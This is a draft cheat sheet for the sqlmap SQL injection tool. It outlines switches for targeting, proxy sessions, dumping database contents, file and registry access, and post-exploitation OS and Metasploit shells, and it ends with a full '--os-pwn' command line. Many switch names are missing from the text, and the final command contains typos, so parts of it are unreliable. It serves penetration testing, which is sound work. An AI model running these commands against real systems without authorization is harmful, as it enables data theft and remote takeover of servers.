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sqlmap Cheat Sheet (DRAFT) by

This is a draft cheat sheet. It is a work in progress and is not finished yet.

Other SQLi Tools

Numerous tools available for asssiting in the discovery of SQLi flaws.
Few tools go beyond data exfilt­ration and many are not currently managed.
BBQSQL is a Python framework to ease and speed the exploi­tation of blind SQLi flaws. 2 Types of blind SQL attack:
Binary Search: Typical technique that splits the character set in one-half
Frequency Search: Based on letters' frequency of occurence in English language text.
Attacks can be coupled with different indicators including timing, HTTP headers, content, size HTTP status codes, and others.


Open source, Python­-based, comman­d-line SQLi tool
Performs In-ban­d/I­nline and Blind SQLi discovery and exploi­tation.
Supports many RDBMS including MySQL, MSSQL, Oracle, Postgr­eSQL, SQLite
Integrates with Metasp­loit, Burp, w3af, and ZAP
Exploit techniques include blind timing, error-­based, blind boolean, stack queries, UNION and more


substa­ntial verbosity
oh my verbosity
There is also a user guide. Sqlmap has many comman­d-line switches to help with discovery and exploit.

Initial Targeting

A URL to kick off sqlmap
Spiders site to discover entry points
Targets forms for injection
Can inform sqlmap of the type of DB if known

Author­iza­tion, Sessions, and Proxies

-r / -l
Captured HTTP Request or proxy log as starting point, can bridge authen­tic­ation gap.
Manually sets cookies
Have sqlmap go through Burp, ZAP, or other proxy
If you have already authen­ticated or interacted with the target the above switches can be useful.
There are some nuances to sqlmap with proxies because it does not automa­tically inherit an authen­ticated session active in y our proxy. It requires config­ura­tion.
In ZAP, toggle the "­Enable Session Tracki­ng".
In Burp, update Session handling rules under Option­s>S­ess­ions. The default only includes browsers and scanner.
Note: There may be a perfor­mance impact.

DB Data Exfil

Dump all data && metadata
No data exfilt­rated, simply provides a count of records. Useful for testing sensitive data stores.
Steals data given the applied constr­aints.
Example: -D Orders -T Customers --dump
Search DB/table for a string

Beyond Data Exfilt­ration

Enumerate DB user accounts
Download files to attack system
Download files to attack system
Upload files to DB system
Read/Write Windows registry keys
Add/Delete Windows registry keys

Post Exploi­tation

Escalate privileges of DBB
--sql-query / --sql-shell
Run single SQL query or get simulated active shell
--os-cmd / --os-shell
Execute single OS command or get simulated intera­ctive OS shell
OOB Metasploit shell/­VNC­/Me­ter­preter, requires an available OOB connection
Note: Requires database to be running a web server with web root that database account can write to and reach. Most effective after pivoting or during an internal engage­ment.

MSF Shell with SQL Map

$ cd /opt/metasploit-framework
$ sqlmap -u "domain/sqli/?id=1&submit=submit" --cookie="Cookie Value" --proxy http://localhost:8080 --user-agent 88 --os-pwn -msf-path /opt/metaspoit-framework